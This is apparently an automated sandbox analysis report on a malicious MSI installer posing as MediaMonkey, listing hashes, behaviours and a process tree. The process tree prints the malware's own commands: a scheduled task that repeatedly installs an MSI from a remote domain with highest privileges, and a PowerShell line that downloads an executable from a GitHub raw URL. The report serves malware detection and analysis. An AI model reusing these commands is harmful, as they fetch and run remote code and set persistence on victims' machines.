Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
15/06/2024, 10:16
Static task
static1
Behavioral task
behavioral1
Sample
adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi
Resource
win10v2004-20240508-en
General
-
Target
adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi
-
Size
248KB
-
MD5
adf35549a252723b8e392ef1643134d8
-
SHA1
0ecafc6cf721543057b7206c0816c106c919e961
-
SHA256
8306ac8c8238290885ea335365248c0ca13f5119a7eec7b030721b1a62a33f3a
-
SHA512
014f4bf78b0f4452580c83120267edf1a09006892a0357923aee7a83ebfa416ac233203c8889aed8ebd36a9b02b41707a3e706d5aca8124d5ce269b071ff2ec7
-
SSDEEP
3072:d39LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDOwqQ+cxbkRqMGOG:FuH2aCGw1ST1wrL5qv
Malware Config
Extracted
https://raw.githubusercontent.com/pavelenko/Media/master/MediaMonkey_4.1.21.1873.exe
Signatures
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
flow ioc 23 raw.githubusercontent.com -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{3C87D5B6-CEF8-42D1-BB65-FACD37298A05} msiexec.exe File opened for modification C:\Windows\Installer\MSID84F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID8DC.tmp msiexec.exe File created C:\Windows\Installer\e57d6a9.msi msiexec.exe File opened for modification C:\Windows\Installer\e57d6a9.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Loads dropped DLL 1 IoCs
pid Process 2744 MsiExec.exe -
pid Process 3084 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000c9712a8ab103c3e30000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000c9712a8a0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900c9712a8a000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dc9712a8a000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000c9712a8a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4408 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 3272 msiexec.exe 3272 msiexec.exe 3084 powershell.exe 3084 powershell.exe 4332 msedge.exe 4332 msedge.exe 1016 msedge.exe 1016 msedge.exe 3084 powershell.exe 3084 powershell.exe 4580 identity_helper.exe 4580 identity_helper.exe 3084 powershell.exe 3084 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
description pid Process Token: SeShutdownPrivilege 4432 msiexec.exe Token: SeIncreaseQuotaPrivilege 4432 msiexec.exe Token: SeSecurityPrivilege 3272 msiexec.exe Token: SeCreateTokenPrivilege 4432 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4432 msiexec.exe Token: SeLockMemoryPrivilege 4432 msiexec.exe Token: SeIncreaseQuotaPrivilege 4432 msiexec.exe Token: SeMachineAccountPrivilege 4432 msiexec.exe Token: SeTcbPrivilege 4432 msiexec.exe Token: SeSecurityPrivilege 4432 msiexec.exe Token: SeTakeOwnershipPrivilege 4432 msiexec.exe Token: SeLoadDriverPrivilege 4432 msiexec.exe Token: SeSystemProfilePrivilege 4432 msiexec.exe Token: SeSystemtimePrivilege 4432 msiexec.exe Token: SeProfSingleProcessPrivilege 4432 msiexec.exe Token: SeIncBasePriorityPrivilege 4432 msiexec.exe Token: SeCreatePagefilePrivilege 4432 msiexec.exe Token: SeCreatePermanentPrivilege 4432 msiexec.exe Token: SeBackupPrivilege 4432 msiexec.exe Token: SeRestorePrivilege 4432 msiexec.exe Token: SeShutdownPrivilege 4432 msiexec.exe Token: SeDebugPrivilege 4432 msiexec.exe Token: SeAuditPrivilege 4432 msiexec.exe Token: SeSystemEnvironmentPrivilege 4432 msiexec.exe Token: SeChangeNotifyPrivilege 4432 msiexec.exe Token: SeRemoteShutdownPrivilege 4432 msiexec.exe Token: SeUndockPrivilege 4432 msiexec.exe Token: SeSyncAgentPrivilege 4432 msiexec.exe Token: SeEnableDelegationPrivilege 4432 msiexec.exe Token: SeManageVolumePrivilege 4432 msiexec.exe Token: SeImpersonatePrivilege 4432 msiexec.exe Token: SeCreateGlobalPrivilege 4432 msiexec.exe Token: SeBackupPrivilege 4596 vssvc.exe Token: SeRestorePrivilege 4596 vssvc.exe Token: SeAuditPrivilege 4596 vssvc.exe Token: SeBackupPrivilege 3272 msiexec.exe Token: SeRestorePrivilege 3272 msiexec.exe Token: SeRestorePrivilege 3272 msiexec.exe Token: SeTakeOwnershipPrivilege 3272 msiexec.exe Token: SeRestorePrivilege 3272 msiexec.exe Token: SeTakeOwnershipPrivilege 3272 msiexec.exe Token: SeRestorePrivilege 3272 msiexec.exe Token: SeTakeOwnershipPrivilege 3272 msiexec.exe Token: SeDebugPrivilege 3084 powershell.exe Token: SeBackupPrivilege 2072 srtasks.exe Token: SeRestorePrivilege 2072 srtasks.exe Token: SeSecurityPrivilege 2072 srtasks.exe Token: SeTakeOwnershipPrivilege 2072 srtasks.exe Token: SeBackupPrivilege 2072 srtasks.exe Token: SeRestorePrivilege 2072 srtasks.exe Token: SeSecurityPrivilege 2072 srtasks.exe Token: SeTakeOwnershipPrivilege 2072 srtasks.exe Token: SeRestorePrivilege 3272 msiexec.exe Token: SeTakeOwnershipPrivilege 3272 msiexec.exe Token: SeRestorePrivilege 3272 msiexec.exe Token: SeTakeOwnershipPrivilege 3272 msiexec.exe Token: SeRestorePrivilege 3272 msiexec.exe Token: SeTakeOwnershipPrivilege 3272 msiexec.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 4432 msiexec.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 4432 msiexec.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe 1016 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3272 wrote to memory of 2072 3272 msiexec.exe 92 PID 3272 wrote to memory of 2072 3272 msiexec.exe 92 PID 3272 wrote to memory of 2744 3272 msiexec.exe 94 PID 3272 wrote to memory of 2744 3272 msiexec.exe 94 PID 3272 wrote to memory of 2744 3272 msiexec.exe 94 PID 2744 wrote to memory of 4372 2744 MsiExec.exe 95 PID 2744 wrote to memory of 4372 2744 MsiExec.exe 95 PID 2744 wrote to memory of 4372 2744 MsiExec.exe 95 PID 4372 wrote to memory of 3688 4372 cmd.exe 97 PID 4372 wrote to memory of 3688 4372 cmd.exe 97 PID 4372 wrote to memory of 3688 4372 cmd.exe 97 PID 3688 wrote to memory of 1892 3688 cmd.exe 98 PID 3688 wrote to memory of 1892 3688 cmd.exe 98 PID 3688 wrote to memory of 1892 3688 cmd.exe 98 PID 1892 wrote to memory of 3792 1892 net.exe 99 PID 1892 wrote to memory of 3792 1892 net.exe 99 PID 1892 wrote to memory of 3792 1892 net.exe 99 PID 3688 wrote to memory of 4408 3688 cmd.exe 100 PID 3688 wrote to memory of 4408 3688 cmd.exe 100 PID 3688 wrote to memory of 4408 3688 cmd.exe 100 PID 4372 wrote to memory of 1016 4372 cmd.exe 101 PID 4372 wrote to memory of 1016 4372 cmd.exe 101 PID 4372 wrote to memory of 3084 4372 cmd.exe 102 PID 4372 wrote to memory of 3084 4372 cmd.exe 102 PID 4372 wrote to memory of 3084 4372 cmd.exe 102 PID 1016 wrote to memory of 1544 1016 msedge.exe 103 PID 1016 wrote to memory of 1544 1016 msedge.exe 103 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 PID 1016 wrote to memory of 5116 1016 msedge.exe 105 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4432
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3DD9B755726C2317F9BD1E5CF3F69ED32⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\\MediaMonkey_4.1.21.1873\run.cmd" "3⤵
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\SysWOW64\cmd.execmd /c "inst.cmd"4⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\SysWOW64\net.exenet session5⤵
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 session6⤵PID:3792
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "BVRKIPTS-7003" /tr "msiexec /ihttps://anicesicerom.com/1809814840 /q" /sc minute /mo 140 /rl highest /f5⤵
- Creates scheduled task(s)
PID:4408
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://player.go-mediamonkey.org/4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9460546f8,0x7ff946054708,0x7ff9460547185⤵PID:1544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:25⤵PID:5116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:4332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:85⤵PID:2888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:15⤵PID:3700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:15⤵PID:1176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:15⤵PID:4968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:15⤵PID:3068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:15⤵PID:3064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:15⤵PID:456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 /prefetch:85⤵PID:5072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:4580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:15⤵PID:5148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:15⤵PID:5408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2896 /prefetch:15⤵PID:5896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:15⤵PID:5540
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$dl = New-Object System.Net.WebClient;$dl.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1)';$f = 'monkey_4.1.21.1873.exe'; $dl.DownloadFile('https://raw.githubusercontent.com/pavelenko/Media/master/MediaMonkey_4.1.21.1873.exe', $f);Stop-Process -Name powershell"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3084
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4892
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5084
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD54158365912175436289496136e7912c2
SHA1813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA51274b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b
-
Filesize
152B
MD5ce4c898f8fc7601e2fbc252fdadb5115
SHA101bf06badc5da353e539c7c07527d30dccc55a91
SHA256bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA51280fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c
-
Filesize
6KB
MD5b79425886a328bd4965fe274bbd48200
SHA173cec51d70f0fd9622fe24105a71a57e71fc20d7
SHA2568989805628e3b71ac7deb80fe8c4d6ca693e044cd2883fa9994957fbe6330634
SHA512456b71a54a91f1b1314526f1df9c85bfa63d49a7a93e0283d4b4790551c70e993a6063e0e99307249bac77cc7f35dfd7be0318f15bd2e5aff13807296f473ca6
-
Filesize
5KB
MD54a0c17da86442691fd4ade0f4eadd581
SHA1b49bef25af5c5d77376093fcd7fb8e323856ddba
SHA256f98e5a92661e55c2f74bcf2e4e6f034f06a8a72786a32f19a2540df55d32b48a
SHA512cb92a045fcdf2e01bb11f192766baf7c45b3dc3abc259cbbadea84f1434bf2383ac38daffe400ccf54b60ce898f25bf84f37f8c477277b5776d93865ba78ac27
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
8KB
MD5da4fe5f1f9691fb51486c7a769f685ef
SHA1a6f4f21d47dd8976c49b9390c9691e73a932335e
SHA2564119ea752b5bbcc97887678fd611cc1d9fd938178b3dbb9389b9b2f59edcde2c
SHA5120638f94b3f61588b3e3f68d4e62e4d5c0e653ec0f2bbc14752b883c1e39a2703b256b7802208975913ab761abb5136392d44f3bc9fff012f3db118298806aeb1
-
Filesize
1KB
MD548db9fdf724085cc0a8e122b3951d9a8
SHA1d536d6da6e9adf5afe5c93032a8586d430b552ee
SHA256a9d926d4b34c5c9498b8a9e4860e00adb614a438d9c1c641cb9a8cef598159de
SHA51210fa4ea04f187fcef18648ae084a9b3a50feb602fb723a73aae2f79dfa1e9b72aaf1484890d3d5f465dbeffb3fd680fa331f1912fa11c91ee9f5234367ca5dad
-
